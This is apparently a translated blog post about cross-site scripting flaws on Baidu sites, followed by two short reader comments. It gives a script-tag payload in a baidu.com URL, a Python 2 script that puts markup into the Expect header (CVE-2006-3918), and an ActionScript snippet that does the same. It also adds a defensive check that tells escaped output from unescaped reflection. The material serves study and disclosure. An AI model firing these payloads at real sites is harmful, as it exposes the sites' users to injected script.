The recently popular Baidu Space XSS


1. Filler

  http://www.baidu.com/index.php?tn="><script>alert('xxs')</script>

2. hi.baidu.com XSS

  #! /usr/bin/python
  #coding=gb2312
  # Python 2 script (httplib, print statement)

  from httplib import HTTPConnection

  conn = HTTPConnection('hi.baidu.com', 80)
  conn.putrequest('GET', '/')
  conn.putheader('Host', 'hi.baidu.com')
  conn.putheader('Content-Type', 'text/xml; charset="utf-8"')
  # The Expect value carries markup; an affected server echoes it in its error page
  conn.putheader('Expect', '<body onload=window.open("http://www.google.com")>')
  conn.endheaders()
  r = conn.getresponse()
  # Print the response body to see whether the header value is reflected
  print r.read()

The vulnerability being exploited is CVE-2006-3918
http://www.securityfocus.com/bid/19661
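
CVE-2006-3918 is about the Expect request header being echoed into the server's error page without sanitization. The following is an added example, not code from the original post or from Apache: it shows the unescaped reflection next to the escaped form, plus a check that classifies how a harmless probe string comes back in a response body. The error-page template, the probe value and all function names are assumptions made for illustration.

```python
import html

# Constructed stand-in for an "Expectation Failed" error page (not the server's real template).
ERROR_417 = (
    "<html><head><title>417 Expectation Failed</title></head><body>\n"
    "<p>The expectation given in the Expect request-header field "
    "could not be met by this server: {expect}</p>\n"
    "</body></html>"
)

# Constructed, inert probe: contains markup characters but no script.
PROBE = '<i data-probe="x7">'


def render_417(expect_value, escape=True):
    """Build the error body. escape=False reproduces the unsanitized reflection."""
    shown = html.escape(expect_value, quote=True) if escape else expect_value
    return ERROR_417.format(expect=shown)


def reflection_status(body, probe):
    """Classify how a probe sent in the Expect header appears in a response body."""
    escaped = html.escape(probe, quote=True)
    if escaped == probe:
        # Without <, >, & or quotes, raw and escaped output look identical.
        raise ValueError("probe must contain at least one HTML metacharacter")
    if probe in body:
        return "reflected-raw"      # markup reaches the browser unmodified
    if escaped in body:
        return "reflected-escaped"  # echoed, but rendered as plain text
    return "not-reflected"


if __name__ == "__main__":
    for label, escape in (("unpatched behaviour", False), ("escaped output", True)):
        body = render_417(PROBE, escape=escape)
        print(label, "->", reflection_status(body, PROBE))
```

Run against a saved response from a server you administer, `reflected-raw` means the error page still needs the header value HTML-escaped or the server needs updating.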

A crafted SWF can be used to exploit this vulnerability

  var req:LoadVars=new LoadVars();
  req.addRequestHeader("Expect",
  "<script>alert('gotcha!')</script>");
  req.send("http://www.target.site/","_blank","GET");

BTW: the WordPress post editor here turned out to be vulnerable to cross-site scripting too -__-

2 Responses to “The recently popular Baidu Space XSS”

  1. jun0717 Says:

      Leaving a bookmark here, hehe~

  2. anhun Says:

    Yikes, I thought it was a problem with Baidu's scripts
